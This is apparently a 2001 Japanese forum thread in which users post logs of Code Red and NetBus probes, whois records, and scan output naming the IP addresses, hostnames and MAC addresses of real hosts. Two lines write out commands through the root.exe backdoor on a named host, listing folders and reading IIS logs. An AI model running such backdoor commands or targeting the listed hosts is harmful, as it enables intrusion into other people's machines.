MAC: 525405F6DA34

IP: 211.48.107.207
Node: ENCODER
Group: ﾆﾄｼﾒｳｪ<B1>
NetBIOS: IS~ENCODER
MAC: 0050DA8E42C9
DNS: ENCODER

IP: 211.169.252.170
NetBIOS: <0102>__MSBROWSE__<02>
Node: <B1>?<B1>､ｽﾄ
Group: ｿｹｼﾔｳｪｶ
MAC: 00E04C677873

IP: 211.234.31.88
Node: EDIT-1
Group: ｿ｡ｵ犲
NetBIOS: IS~EDIT-1
MAC: 0001028C61EF
DNS: EDIT-1

IP: 211.52.17.12
DNS: MANAGER
Node: MANAGER
Group: ｰ?ｸｮｺﾎ
NetBIOS: IS~MANAGER
MAC: 0050FC3AF609

IP: 211.252.120.194
Node: ﾃｵｺﾏﾃﾊｵ�耙<B1>
Group: WORKGROUP
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00E018C37E47
DNS: ﾃｵｺﾏﾃﾊｵ�耙ｱｳ

IP: 203.152.236.108
Node: BAZ
Group: WORKGROUP
NetBIOS: BAZ 
MAC: 444553540000
DNS: c28-p107.senet.com.au

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.117.118.0
b. [ネットワーク名] KDDI-NET
f. [組織名] DION (KDDI株式会社)
g. [Organization] DION (KDDI CORPORATION)
m. [運用責任者] KT6191JP
n. [技術連絡担当者] KW062JP
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/02/07
[返却年月日]
[最終更新] 2001/07/30 10:49:12 (JST)
[email protected]

IP: 211.54.68.74
Node: INTRANET
Group: ﾀﾎﾅﾍｳﾝｻ鄒<F7>ﾆﾀ
NetBIOS: IS~INTRANET
MAC: 000102336AC6
DNS: INTRANET

IP: 211.227.252.184
Node: ﾁ､ｿｵ<B1>
Group: ｳﾗｶ?ｾﾆ
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00A0D21CD78C
DNS: ﾁ､ｿｵｱ

ww.ehouse.ne.jp - - [08/Aug/2001:02:08:39 +0900] "GET /default.ida
鯖からCodeRed来たよ。藁

IP: 211.40.35.200
Node: <B1>霏ﾚｿｵ
Group: E-ｼﾖｷ郛ﾇｻ鄒<F7>ﾆﾀ
NetBIOS: IS~<B1>霏ﾚｿｵ
MAC: 0050BF417967
DNS: ｱ霏ﾚｿｵ

IP: 211.172.179.28
Node: BILLING
Group: ｵｿﾇﾘﾀｯｼ<B1>ｹ貍
NetBIOS: IS~BILLING
MAC: 0003471AD267
DNS: BILLING

IP: 61.118.149.187
Node: SUNABA
Group: WORKGROUP
NetBIOS: 砂場　俊<96>
MAC: 444553547777
DNS: p2187-ipad02maru.tokyo.ocn.ne.jp

IP: 128.227.190.46
Node: LAB26
Group: CELABGROUP
MAC: 00010266276D

IP: 64.39.176.65
Node: JOCELYN
Group: WORKGROUP
MAC: 444553547777
DNS: 65.comnet.speede.com

[211.100.8.167]

IP: 61.138.138.164
Node: SL00
Group: ﾊｯﾁﾖﾍ<F8>ｰ
NetBIOS: IS~SL00
MAC: 000238001EE4
DNS: SL00

IP: 211.180.189.179
Node: ﾀ･ｼｭﾇﾎ
Group: 1
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00E04C4B0C9D

IP: 211.116.199.55
NetBIOS: IS~ｼｭ<B1>､ｿ<F8>
Node: ｼｭ<B1>､ｿ<F8>
Group: ｿｬ<B1>ｸｼﾒ
MAC: 00D0B7E095B1
DNS: ｼｭｱ､ｿ

CodeRed
> 211.110.111.178
> 203.239.137.202
> 203.146.75.131
> 203.234.70.188
> 203.193.56.40
> 203.234.161.122

IP: 211.189.226.38
Node: PRINCE
Group: COMSCIENG
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00C026F0B5CC
DNS: PRINCE

韓国からSolaris のin.lpdを狙った攻撃。死ね。

Aug 7 19:52:24 210.91.58.1:4780 -> xxx.xxx.xxx.72:515 SYN ******S*
Aug 7 19:52:24 210.91.58.1:4785 -> xxx.xxx.xxx.77:515 SYN ******S*
Aug 7 19:52:24 210.91.58.1:4781 -> xxx.xxx.xxx.73:515 SYN ******S*
Aug 7 19:52:24 210.91.58.1:4782 -> xxx.xxx.xxx.74:515 SYN ******S*
Aug 7 19:52:24 210.91.58.1:4815 -> xxx.xxx.xxx.107:515 SYN ******S*
Aug 7 19:52:24 210.91.58.1:4787 -> xxx.xxx.xxx.79:515 SYN ******S*
Aug 7 19:52:24 210.91.58.1:4804 -> xxx.xxx.xxx.96:515 SYN ******S*
Aug 7 19:52:24 210.91.58.1:4806 -> xxx.xxx.xxx.98:515 SYN ******S*
Aug 7 19:52:24 210.91.58.1:4829 -> xxx.xxx.xxx.121:515 SYN ******S*

IP: 211.107.15.240
Node: TOKYOBAKERY
NetBIOS: IS~TOKYOBAKERY
Group: WORKGROUP
MAC: 0004766F3D4B
DNS: TOKYOBAKERY

http://p10-dn03tagawa.fukuoka.ocn.ne.jp/scripts/root.exe?/c+dir+"c:\My%20Documents"

↓韓国のアタッカーはこの範囲のIPをよく使っている。要注意
Netblock: 202.0.0.0 - 203.255.255.255
すべて、port:80 狙い。全くあきれたものだ。

24.9.75.189
検索したら@Home Networkだった。アメリカらしい。またかくそ。

IP: 61.79.146.213
Node: WEBMANIA
Group: DIGITALHAUS
NetBIOS: IS~WEBMANIA
MAC: 00C026E2FAF1
DNS: WEBMANIA

IP: 211.41.143.124
Node: WAREZ
Group: WORKGROUP
NetBIOS: IS~WAREZ
MAC: 0000E8EC59A8
DNS: WAREZ

お宝あるかもしれないな・・・

IP: 211.254.30.201
DNS: GENIUSBOY
Node: GENIUSBOY
Group: NSILAB
NetBIOS: GENIUSBOY ・
MAC: 0000F0691664

IP: 66.80.43.181
DNS: sdsl-66-80-43-181.dsl.lax.megapath.net

ドサクサにまぎれて RPC port probe

IP: 211.202.77.1
NetBIOS:
__MSBROWSE__

Node: FIREWALL SERVER
Group: WORKGROUP
MAC: 0050DAC8BB50

FIREWALL SERVER・・・。なにやってんだか。

211.251.110.252

IP: 211.196.200.52
Node: CEO
Group: KD
NetBIOS: IS~CEO
MAC: 0000F0694C4A
DNS: CEO

IP: 211.226.84.115
Node: ｺｸﾀﾏｷｯｽﾇ
Group: ACHEM
NetBIOS: IS~ｺｸﾀﾏｷｯｽﾇ
MAC: 0003474CE24A
DNS: ｺｸﾀﾏｷｯｽﾇ

おまえら三流プログラマーに何が出来るんじゃ！！

ウィルス＆メルボム上等！

来週ＰＣ買い換えるから折れを潰してみろよ！

どうせおまえらなんか何も出来ないと思うけど。

折れにはノートン君がついてるからまず無理だよね。

　　　　　　　[email protected]

>>483
なにそれ？

こいつら全員default.ida
61.10.99.23/61.114.194.184/61.114.206.143/61.114.206.16/
61.114.206.51/61.114.215.53/61.114.243.162/61.114.249.28/
61.114.251.158/61.114.85.148/61.117.113.244/61.121.227.49/
61.128.207.150/61.129.76.106/61.131.118.150/61.132.122.82/
61.133.173.208/61.135.15.12/61.137.140.24/61.137.180.108/
61.138.10.100/61.138.130.66/61.138.137.178/61.138.174.18/
61.143.132.24/61.143.233.126/61.147.185.143/61.150.125.4/
61.154.14.94/61.154.41.162/61.155.90.94/61.157.94.42/
61.158.144.74/61.158.181.213/61.170.152.102/61.170.153.7/
61.175.137.104/61.175.164.90/61.180.8.41/61.181.208.101/
61.182.251.13/61.182.251.213/61.203.217.21/61.218.150.237/
61.218.2.171/61.218.208.162/61.218.70.66/61.219.236.202/
61.219.96.253/61.220.243.114/61.222.16.50/61.222.33.10/
61.24.238.65/61.251.177.6/61.32.86.61/61.33.19.3/
61.33.28.254/61.33.8.58/61.37.37.120/61.43.184.13/
61.43.231.126/61.73.16.164/61.73.190.81/61.73.43.71/
61.75.49.169/61.76.108.197/61.76.194.164/61.77.147.67/
61.77.211.12/61.77.49.160/61.78.252.190/61.79.135.28/
61.79.155.161/61.79.194.158/61.81.28.118/63.204.84.115/
127.0.0.1/147.83.50.190/203.249.110.151/211.10.2.242/
211.10.5.69/211.104.116.170/211.104.23.35/
211.112.126.223/211.113.75.100/211.115.216.67/
211.115.73.101/211.152.232.212/211.170.69.227/
211.172.213.242/211.188.137.88/211.201.70.116/
211.204.90.99/211.216.183.253/211.219.101.81/
211.219.20.123/211.219.234.157/211.219.98.163/
211.22.125.2/211.225.35.176/211.227.62.214/211.23.69.155/
211.230.128.15/211.232.159.70/211.35.145.207/
211.38.189.125/211.38.70.170/211.39.5.1/211.54.86.139/
211.55.55.43/211.57.244.35/211.62.59.51/211.73.207.83/

IP: 61.32.135.150
Node: SANGWOO
Group: ﾀﾌｳ?ﾁｨ
NetBIOS: IS~SANGWOO
MAC: 0048546DBE88
DNS: SANGWOO

IP: 61.128.179.97
Node: ﾂ豢
Group: ｵ邉<A7>
MAC: 444553540000

IP 210.238.97.64

Port No.113 Open

IP: 61.72.94.150
Node: INTER1
Group: ﾀﾎﾅﾍｳﾝｼ<B1B1>
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00C0265B9A47
DNS: INTER1

>>488
PPPなんかさらしてどうすんの？化けてるし。

IP: 61.33.227.231
Node: <B1>霖ｾｰ
Group: USERS
NetBIOS: IS~<B1>霖ｾｰ
MAC: 00022A00DD7E
DNS: ｱ霖ｾｰ

不正アクセスなんかして何が楽しいんだろ

Asia Pacific Network Information Center (NETBLK-APNIC2)
These addresses have been further assigned to Asia-Pacific users.
Contact info can be found in the APNIC database,
at WHOIS.APNIC.NET or http://www.apnic.net/
Please do not send spam complaints to APNIC.
AU

Netname: APNIC3
Netblock: 61.0.0.0 - 61.255.255.255
Maintainer: AP

Coordinator:
Administrator, System (SA90-ARIN) [No mailbox]
+61-7-3367-0490

Domain System inverse mapping provided by:

NS.APNIC.NET 203.37.255.97
NS.RIPE.NET 193.0.0.193
RS1.ARIN.NET 192.149.252.21

Regional Internet Registry for the Asia-Pacific Region.

*** Use whois -h whois.apnic.net***

*** or see http://www.apnic.net/db/ for database assistance ***

Record last updated on 20-Apr-1999.
Database last updated on 8-Aug-2001 23:09:21 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

The firewall has blocked Internet access to your computer (HTTP) from 210.119.59.132 (TCP Port 4692) [TCP Flags: S].

IP: 61.118.173.46
DNS: p8046-ipad02maru.tokyo.ocn.ne.jp
しつこい氏ねや

>>493
ピンポンダッシュかと思ワレ。

激しく尿意

IP: 200.207.190.11
Node: SERVIDOR
Group: ADVOCACIA
DNS: 200.207.190.11.dsl.telesp.net.br

IP: 64.39.176.65
Node: JOCELYN
Group: WORKGROUP
MAC: 444553547777
DNS: 65.comnet.speede.com

IP: 202.225.199.84
DNS: wink199084.winknet.ne.jp

IP: 128.227.190.46
Node: LAB26
Group: CELABGROUP
MAC: 00010266276D

不正アクセスはしょっちゅうされてるが、
放っておけばどんな被害があるんだ？（ウイルスは別だが）

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.248.20.0
b. [ネットワーク名] NIFTY-SERVE
f. [組織名] ニフティサーブ ネットワーク(ニフティ株式会社)
g. [Organization] NIFTY SERVE NETWORK(NIFTY Corporation)
m. [運用責任者] KT855JP
n. [技術連絡担当者] KS1046JP
n. [技術連絡担当者] YN917JP
p. [ネームサーバ] ns0.nifty.ad.jp
p. [ネームサーバ] ns1.nifty.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 1998/06/09
[返却年月日]
[最終更新] 2001/06/21 13:48:27 (JST)
[email protected]

なんか勘違いしてるやつ居ないか？

Niftyとか大手プロバイダの情報晒したって、何にもならないだろう？

ボケと突っ込み掲示板に名称変更決定。

いや、厨房のオナニーだから別にいいんだよ。
別にいいんだが、でかいコピペ貼ってあるスレが上がってると邪魔だから下げでやれよ

>>413ですが
これはどういう種類のport scanですか？
ヒントだけでもお願いします

単に443許可するの忘れてて引っかかっただけのような・・・

訂正
やっぱport scanか

>>507
え？夏房にも分かるように
もっと詳しくお願いしまする

今点滅したいやーな不正侵入者のＩＰ書くぞ！

211.106.131.95
トロイの木馬なんちゃらだってさ！やめろ！！

ルータで開けてるｐｏｒｔが
21　23　80　443　8080
なんですが、
50859,50860,50861,50862,50864,...]　　←これのportを
向こうから見れたって事ですか?
443越しに見られたとか？

zaq3d73a427.zaq.ne.jp - - [09/Aug/2001:18:33:00 +0900] "GET /def
zaq3d73a427.zaq.ne.jp - - [09/Aug/2001:18:33:01 +0900] "GET /def
zaq3d73a427.zaq.ne.jp - - [09/Aug/2001:18:33:02 +0900] "GET /def
zaq3d73a427.zaq.ne.jp - - [09/Aug/2001:18:33:03 +0900] "GET /def
zaq3d73a427.zaq.ne.jp - - [09/Aug/2001:18:33:03 +0900] "GET /def
zaq3d73a427.zaq.ne.jp - - [09/Aug/2001:18:33:07 +0900] "GET /def
zaq3d73a427.zaq.ne.jp - - [09/Aug/2001:18:33:09 +0900] "GET /def
zaq3d73a427.zaq.ne.jp - - [09/Aug/2001:18:33:10 +0900] "GET /def
こいつ何よ？

つーかルータ入れてるような人が騒ぐような事なのか？俺は厨だからさっぱりわからん
単に443ノックされたってだけの話なんじゃないの？
5万台のポートは相手のだろ。443へのport scanが
detectedなんだから全く持って問題ないと思うのだが？違うの？

＃5万台へのport scanならいっそう問題ない気が

>>512
CodeRed

>>511
ポートは発信元と宛先がある。あとは本で読め。

問題あるとか無いとかじゃなくて
どういうscanか？とか、
いつものport scanと違ので、どういう種類なのかとか。
好奇心なんだけどね
自分でも問題ないと思ってるけどさ。
好奇心だよ。聞くきっかけだしね（ｗ
自分のマシンに同じ事やってみたいしね

あげてしまった・・・
>>516　サンクス
本で勉強してみるよ

>>512
一つのIPに対してんな連続して叩くもんなの？

>>518
普通は、そういうことをするのは間抜けです。
TCPだと、接続要求に対して相手から接続応答の返事がないとOSが勝手に再送をする場合が
あるのでルータに複数ログが残ることはあるが、Webサーバのログはアプリだからそういうことは
ない。

518は>>514の間違い　すまそ

512のzaq3d73a427.zaq.ne.jp君は結局なんなんでしょ。
LOGはhttpdの物です。

>>520

httpのリクエストはCode Redぽいけど、同じところから来るのは少し変。

(1) Code Redを偽装して別のことをやっている。
(2) 社内LANなどに複数感染したマシンがあり、透過型プロキシかNAT装置を伝って
CodeRedをばら撒いている。複数台の装置なんだけど、アドレス変換が掛かって
外から見ると同じIPアドレスになっちゃってる。

(2)の気がするな。
ZAKというプロバイダがNATを使用して複数の端末で同じIPアドレスを共有してるの
でしょう。

[211.10.11.253]
この侵入者に関する詳細はわかっていません。

調べろよ！

>>521
code redは同じ所に連発で送る事もあるよ。
間髪入れずに30連発来る事もある(らしい)

211.103.56.46 (TCP Port 3520) [TCP Flags: S].
210.241.20.2 (TCP Port 4837) [TCP Flags: S].
210.160.99.130 (TCP Port 1072) [TCP Flags: S]. ns.it.iwasakinet.co.jp
210.109.62.98 (TCP Port 4476) [TCP Flags: S].
210.85.112.184 (TCP Port 3767) [TCP Flags: S]. 184.c210-85-112.ethome.net.tw
210.179.226.130 (TCP Port 3166) [TCP Flags: S].
210.216.153.20 (TCP Port 1939) [TCP Flags: S].
210.223.208.15 (TCP Port 4220) [TCP Flags: S].
210.85.17.20 (TCP Port 1193) [TCP Flags: S].
210.202.176.133 (TCP Port 2599) [TCP Flags: S].
210.95.63.197 (TCP Port 4738) [TCP Flags: S].
210.127.189.214 (TCP Port 4136) [TCP Flags: S].
210.91.86.98 (TCP Port 1807) [TCP Flags: S].
210.90.69.184 (TCP Port 1996) [TCP Flags: S].
157.252.230.12 (TCP Port 1963) [TCP Flags: S].
210.126.249.8 (TCP Port 1199) [TCP Flags: S].
210.105.70.120 (TCP Port 3049) [TCP Flags: S].
210.205.6.251 (TCP Port 1587) [TCP Flags: S].
210.166.201.105 (TCP Port 3541) [TCP Flags: S].
210.85.172.184 (TCP Port 1877) [TCP Flags: S].
210.75.52.217 (TCP Port 4486) [TCP Flags: S].
211.62.59.2 (TCP Port 2223) [TCP Flags: S].

IP: 211.105.18.46
Node: 301HO-103
Group: WORKGROUP
NetBIOS: ｹ
MAC: 00E07D047F31

IP: 211.189.59.122
Node: TOMATO
Group: DSTORM
NetBIOS: IS~TOMATO
MAC: 00A0C9CF2883
DNS: TOMATO

IP: 211.106.100.44
Node: ﾇ羯ﾎ
Group: WORKGROUP
NetBIOS: IS~ﾇ羯ﾎ
MAC: 0050BF31E213
DNS: ﾇ羯ﾎ

一向に治まる気配がないね。

騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・電話番号などから住所などの詳細を調べて欲しい・等など
何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com

↑
CodeREDｳｻﾞｲんで何とかして下さい。

Windows 2000Server/Professional使ってる人はここで晒す前に
自分がcode redかかってないか確認してほしい。
なんかこのスレ住民からノックされている気もしてきた…

210.90.77.84

210.102.244.26

210.244.21.222

210.119.153.38

210.109.249.163

210.32.60.5

210.253.112.245

IP: 211.197.254.6
Node: UNSIGN01
Group: ｵｿｼｭｿ?ｴ?ﾇﾐ
NetBIOS: IS~UNSIGN01
MAC: 444553547777
DNS: UNSIGN01

210.99.135.96

210.92.201.134

210.214.53.9

210.115.47.164

210.204.167.27

210.201.46.28

210.236.18.179

210.131.120.254

210.123.166.30

210.197.121.68

210.113.18.246

210.242.193.188

210.107.98.35

210.220.104.168

210.64.51.176

210.116.141.126

210.102.244.27

210.118.61.116

210.103.59.199

210.197.172.179

210.91.65.175

211.197.254.62
Net Bus トロイの木馬のデフォルト遮断

Asia Pacific Network Information Center (APNIC2)
These addresses have been further assigned to Asia-Pacific users.
Contact info can be found in the APNIC database,
at WHOIS.APNIC.NET or http://www.apnic.net/
Please do not send spam complaints to APNIC.
AU

Netname: APNIC-CIDR-BLK
Netblock: 202.0.0.0 - 203.255.255.255
Maintainer: AP

Coordinator:
Administrator, System (SA90-ARIN) [No mailbox]
+61-7-3367-0490

Domain System inverse mapping provided by:

SVC00.APNIC.NET 202.12.28.131
NS.APNIC.NET 203.37.255.97
NS.TELSTRA.NET 203.50.0.137
NS.RIPE.NET 193.0.0.193

Regional Internet Registry for the Asia-Pacific Region.

*** Use whois -h whois.apnic.net***
*** or see http://www.apnic.net/db/ for database assistance ***


Record last updated on 18-Jun-1999.
Database last updated on 8-Aug-2001 23:09:21 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information

IP: 211.116.128.48
Node: ﾃｻｰｳ<B1>ｸｸｮ
Group: MAVL
NetBIOS: IS~ﾃｻｰｳ<B1>ｸｸｮ
MAC: 004F4E082BB5
DNS: ﾃｻｰｳｱｸｸｮ

IP: 211.105.120.98
Node: C7W6H1
Group: WORKGROUP
MAC: 444553540000
DNS: C7W6H1
↑Net Bus

　　┏━━━━━━━━━━━━━━━━━┓
　　┃　 　 コードレッド男爵があらわれた! 　 　 ┃
　　┗━━━━━━━━━━━━━━━━━┛

　　　　　　　|
　　　 ＼／￣￣＼／
　　 ／　| ｀皿´　;::|
　 < <￣| 　 　 /;:::|￣
　　＼＼＼＿/_／＼
　　　 ＼＼　|
　　　　　＼　　 　 ＼
　　　　　　|　　　　|＼＼
　　　　　　＼　　　＼　> >
　　　　　　　　 >　　　|／＼
　　　　　　　 //　　／　　　＼
　　　　　　 //　 ／　　　　　　）
　　　　　 //　/〜〜〜〜〜〜
　　　　 （（　（
　　　　　 ヽ＼＼
　　　　　　　 ヽ＼＼__
　　　　　　　　　 ヽ＼ |
　　　　　　　　　　 しU

┏━━━━━━━━━━━━━━━┓
┃コードレッド男爵の放つ　　　　　　　 .┃
┃強烈なトラフィック攻撃！　　 　 　 　 ┃
┗━━━━━━━━━━━━━━━┛

　　　　　　　　|
　　　 ＼／￣￣＼／　　／￣￣￣￣￣￣￣￣￣￣
　　　　　|::; ｀皿´　|　　＜　トトトトトトトトト、トラフィック！！
　　　 ￣|:::;ヽ　　　|￣　　＼＿＿＿＿＿＿＿＿＿＿
　　　　　＼__＼_／＼
　　　　　 / 　　　 ＼
　　　　　//|　_　　 ｌ |　　＿
　　　　/| |／　ヽ　 | |／っ､､ヽ
　　　/　＼/⌒゛゛/ ＼/ 　 ```
　　/　　　|　　 /　ヽ。　　　　ヽ。
　/　　　　| 　| |　　　　。　　　　。
　〜〜〜 |　|| |　　　　　。　 　　。
　　　 　　 | / | |　　　　　　ヽ　 　｡　　　｡
　　　　 　//　| |　　　　　　　 　 ＿＿＿
　　　　 //　　| |　　 　　　　　／´∀｀；;::＼　＜グワァァァァ！！重い！！
　　　　//　 　| |　　　　　　 /　　　　/::::::::::|
　　　　U　　　U　　　　　　 | ./|　　/:::::|::::::|
.　　　　　　　　　　　　　　　| |｜／::::::::|::::::|

IP: 211.173.60.218
Node: ｿ?ｸｮｼ
Group: CHO
NetBIOS: IS~ｿ?ｸｮｼ
MAC: 0000F01E83B4
DNS: ｿ?ｸｮｼｭｹ

211.103.56.46 (TCP Port 3520) [TCP Flags: S].
210.241.20.2 (TCP Port 4837) [TCP Flags: S].
210.160.99.130 (TCP Port 1072) [TCP Flags: S]. ns.it.iwasakinet.co.jp
210.109.62.98 (TCP Port 4476) [TCP Flags: S].
210.85.112.184 (TCP Port 3767) [TCP Flags: S]. 184.c210-85-112.ethome.net.tw
210.179.226.130 (TCP Port 3166) [TCP Flags: S].
210.216.153.20 (TCP Port 1939) [TCP Flags: S].
210.223.208.15 (TCP Port 4220) [TCP Flags: S].
210.85.17.20 (TCP Port 1193) [TCP Flags: S].
210.202.176.133 (TCP Port 2599) [TCP Flags: S].
210.95.63.197 (TCP Port 4738) [TCP Flags: S].
210.127.189.214 (TCP Port 4136) [TCP Flags: S].
210.91.86.98 (TCP Port 1807) [TCP Flags: S].
210.90.69.184 (TCP Port 1996) [TCP Flags: S].
157.252.230.12 (TCP Port 1963) [TCP Flags: S].
210.126.249.8 (TCP Port 1199) [TCP Flags: S].
210.105.70.120 (TCP Port 3049) [TCP Flags: S].
210.205.6.251 (TCP Port 1587) [TCP Flags: S].
210.166.201.105 (TCP Port 3541) [TCP Flags: S].
210.85.172.184 (TCP Port 1877) [TCP Flags: S].
210.75.52.217 (TCP Port 4486) [TCP Flags: S].
211.62.59.2 (TCP Port 2223) [TCP Flags: S].
210.77.216.51 (TCP Port 2998) [TCP Flags: S].
210.36.99.10 (TCP Port 1048) [TCP Flags: S].
210.15.12.18 (TCP Port 4474) [TCP Flags: S].
210.85.43.47 (TCP Port 4010) [TCP Flags: S].
210.111.45.211 (TCP Port 4782) [TCP Flags: S].
210.225.54.120 (TCP Port 2500) [TCP Flags: S].
212.143.20.146 (TCP Port 4405) [TCP Flags: S].
210.98.100.117 (TCP Port 1345) [TCP Flags: S].
210.76.97.226 (TCP Port 2281) [TCP Flags: S].
210.92.36.42 (TCP Port 2461) [TCP Flags: S].
210.221.106.200 (TCP Port 1420) [TCP Flags: S].
210.239.127.14 (TCP Port 65047) [TCP Flags: S].
210.125.178.100 (TCP Port 4184) [TCP Flags: S].
210.73.37.34 (TCP Port 3016) [TCP Flags: S].
210.123.5.45 (TCP Port 3930) [TCP Flags: S].
210.110.150.142 (TCP Port 1132) [TCP Flags: S].
65.15.102.122 (TCP Port 2684) [TCP Flags: S].
210.102.247.184 (TCP Port 4615) [TCP Flags: S].
210.110.144.247 (TCP Port 1742) [TCP Flags: S].
210.166.235.3 (TCP Port 2201) [TCP Flags: S].
210.220.76.62 (TCP Port 3525) [TCP Flags: S].
210.126.196.235 (TCP Port 3757) [TCP Flags: S].
210.127.252.2 (TCP Port 3822) [TCP Flags: S].
210.66.53.149 (TCP Port 1672) [TCP Flags: S].
210.124.206.157 (TCP Port 3390) [TCP Flags: S].
210.117.63.223 (TCP Port 2788) [TCP Flags: S].
210.115.9.23 (TCP Port 3755) [TCP Flags: S].
210.93.205.77 (TCP Port 3761) [TCP Flags: S].
210.166.235.3 (TCP Port 3147) [TCP Flags: S].
210.123.98.162 (TCP Port 1700) [TCP Flags: S].
210.12.78.28 (TCP Port 1743) [TCP Flags: S].
210.132.122.125 (TCP Port 2384) [TCP Flags: S].
210.223.208.101 (TCP Port 2486) [TCP Flags: S].
210.223.208.101 (TCP Port 3210) [TCP Flags: S].
210.64.51.186 (TCP Port 4238) [TCP Flags: S].
210.176.103.245 (TCP Port 1372) [TCP Flags: S].

The firewall has blocked Internet access to your computer (FTP) from 193.219.52.204 (FTP) [TCP Flags: S].

inetnum: 210.134.183.208 - 210.134.183.223
netname: FFS-FDINET
descr: FUJIFILM SOFTWARE CO., LTD.
country: JP
admin-c: KH4936JP
tech-c: KH4936JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
changed: [email protected] 20010629
changed: [email protected] 20010801
source: JPNIC

IP: 61.219.145.131
DNS: 61-219-145-131.HINET-IP.hinet.net

IP: 61.220.153.234
DNS: 61-220-153-234.HINET-IP.hinet.net

IP: 61.127.76.197
DNS: f-hiroshima-076197.zero.ad.jp

IP: 62.211.53.186
DNS: r-fi057-2-442.tin.it

211.172.176.224

inetnum: 211.172.0.0 - 211.199.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20000607
changed: [email protected] 20010606
source: APNIC

10秒間に126回

xe?/c+echo+Content-Type:+text/plain&&echo.&&type+\winnt\system32\logfiles\w3svc1\ex010810.log

Reverse DNS Lookup of 210.196.3.183
The computer name ("domain name") identified for this IP address is:

bind.dion.ne.jp

IP: 213.121.118.33
Node: GREG
Group: WORKGROUP
MAC: 444553540000
DNS: host213-121-118-33.in-addr.btopenworld.com

IP: 24.141.246.169
Node: HPPAV
Group: HEWLETTPACKARD
NetBIOS: HP AUTHORIZED C
MAC: 0010B58C94C1

IP: 62.226.127.195
DNS: p3EE27FC3.dip.t-dialin.net
Node: LUNA
Group: SFS
MAC: 444553540000

IP: 64.231.236.206
DNS: HSE-Montreal-ppp132595.qc.sympatico.ca
Node: OEMCOMPUTER
Group: OEMWORKGROUP
NetBIOS: STANDARD
MAC: 444553547777

IP: 24.184.11.77
Node: XVQ0N31
Group: WORKGROUP
NetBIOS: DEFAULT
MAC: 0080C6FA6038
DNS: ool-18b80b4d.dyn.optonline.net

>>572
ちょっと待ったれや〜!
Dionのネームサーバーやんけ!

で、どんなアタックが来たの？

inetnum: 210.243.128.0 - 210.243.255.255
netname: SEEDNET
descr: Digital United Inc.
descr: 9F, No. 125, Song Jiang Road
descr: Taipei, Taiwan
country: TW
admin-c: CY74-AP
tech-c: CY74-AP
mnt-by: MAINT-TWNIC-NS
changed: [email protected] 20000113
source: APNIC

規則 NetBus ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 のｾｷｭﾘﾃｨ警告を表示しました
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀ (211.207.28.31､ 3369)

規則 NetBus ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 のｾｷｭﾘﾃｨ警告を表示しました
ﾘﾓｰﾄｺﾝﾋﾟｭｰﾀ (211.207.28.107､ 4131)

不正アクセスしてきたやつって言うのは犯罪者？

>>577
踏み台にされてるのもある可能性があるので、そうとも限らない

初心者ですいませんが、踏み台かそうでないかって、
どうやって見分けるのですか？
tracerouteとかでわかります？

IP: 62.158.185.128
Node: SERVER
NetBIOS: <0102>__MSBROWSE__<02>
Group: RAE_B_M
DNS: p3E9EB980.dip.t-dialin.net

IP: 61.219.238.8
Node: WWW
NetBIOS: IS~WWW
Group: GAMEPUB
MAC: 0080AD7C1D08
DNS: WWW
IP: 211.196.254.16
Node: PIGAMO
Group: WORKGROUP
NetBIOS: WORKGROUP 
MAC: 005345000000
DNS: PIGAMO
IP: 61.143.76.39
Node: ZJWB-JXXH01
Group: WORKGROUP
NetBIOS: IS~ZJWB-JXXH01
MAC: 5254AB100C26
DNS: ZJWB-JXXH01
IP: 211.100.17.201
Node: CMEPCSERVER
Group: CMEPC
NetBIOS: IS~CMEPCSERVER
MAC: 00D0B7BA1593
DNS: CMEPCSERVER
IP: 211.217.224.94
Node: JESUS
Group: WORKGROUP
NetBIOS: IS~JESUS
MAC: 525405C1612A
DNS: JESUS
IP: 211.62.59.124
Node: LAOAJZR67PUCVK5
NetBIOS: IS~OAJZR67PUCVK5
Group: WORKGROUP
MAC: 0000E23D16D6
DNS: LAOAJZR67PUCVK5
IP: 211.47.65.222
Node: EDUBUYSELL
NetBIOS: EBEST 
Group: EBEST365.COM
MAC: 00508B9A3409
DNS: EDUBUYSELL
IP: 211.188.54.9
Node: RSB
Group: NEXBITEC
NetBIOS: RSB j
MAC: 00010295075E
DNS: RSB
IP: 211.189.163.156
Node: SMOOII
Group: ｱ箴�ｰｳｹﾟｺﾎ
NetBIOS: IS~SMOOII
MAC: 00105A75EFF3
DNS: SMOOII
等

hcc3d73d014.bai.ne.jp - [10/Aug/2001:21:21:12 +0900]

